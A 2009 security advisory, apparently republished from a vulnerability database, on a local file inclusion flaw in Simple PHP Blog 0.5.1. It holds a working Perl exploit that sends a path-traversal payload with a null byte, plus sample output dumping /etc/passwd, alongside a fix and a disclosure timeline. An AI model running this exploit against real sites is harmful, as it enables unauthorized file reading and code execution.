[ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local File Include vulnerability

2009-12-21T00:00:00
ID SECURITYVULNS:DOC:22975
Type securityvulns
Reporter Securityvulns
Modified 2009-12-21T00:00:00

Description

============================================= INTERNET SECURITY AUDITORS ALERT 2009-005 - Original release date: March 2nd, 2009 - Last revised: December 18th, 2009 - Discovered by: Juan Galiana Lara - Severity: 6.8/10 (CVSS scored) =============================================

I. VULNERABILITY

Simple PHP Blog <= 0.5.1 Local File Include vulnerability

II. BACKGROUND

Simple PHP Blog is a blog system does not requires database setup, and is very easy to install.

III. DESCRIPTION

Simple PHP Blog <= 0.5.1 is affected by a Local File Include vulnerability in 'languages_cgi.php' due to parameter 'blog_language1' is not properly sanitized.

IV. PROOF OF CONCEPT

The affected code:

62 require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

Exploit:

!/usr/bin/perl

Local File Include Exploit

Simple PHP Blog <= 0.5.1

jgaliana <at> isecauditors=dot=com

Internet Security Auditors

use LWP::UserAgent;

if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); } $ua = LWP::UserAgent->new; $ua->agent("Simple PHP Blog Exploit ^_^"); $ua->default_header('Cookie' => "sid=$ARGV[3]"); my $req = new HTTP::Request POST => "http://$ARGV[0]$ARGV[1]/languages_cgi.php"; $req->content_type('application/x-www-form-urlencoded'); $req->content("blog_language1=../../../../..$ARGV[2]%00"); my $res = $ua->request($req);

if ($res->is_success) { print $res->content; } else { print "Error: " .$res->status_line, "\n"; }

$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1 root:*:0:0:root:/root:/bin/bash

The bug can be exploited with or without 'magic_quotes_gpc', but note that if magic_quotes_gpc is set to Off, an attacker can view any file, adding a '\0' character like /etc/passwd, if not only can include php files, allowing to execute any local php files.

V. BUSINESS IMPACT

The impact is the attacker can read arbitrary files in the context of the webserver and execute arbitrary local php scripts.

VI. SYSTEMS AFFECTED

Versions prior and including 0.5.1 are affected In order to patch the application the function file_exists() and basename() must be added to the affected code.

VII. SOLUTION

Change line 62 of languages_cgi.php in order to filter $_POST[ 'blog_language1' ] variable.

if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ])) require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

VIII. REFERENCES

http://www.simplephpblog.com http://sourceforge.net/projects/sphpblog/ http://www.isecauditors.com

IX. CREDITS

This vulnerability has been discovered and reported by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY

March 02, 2009: Initial release. December 18, 2009: Last revision.

XI. DISCLOSURE TIMELINE

March 02, 2009: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com) March 03, 2009: Notified to developer. No response. December 13, 2009: Notified again. No response. December 18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.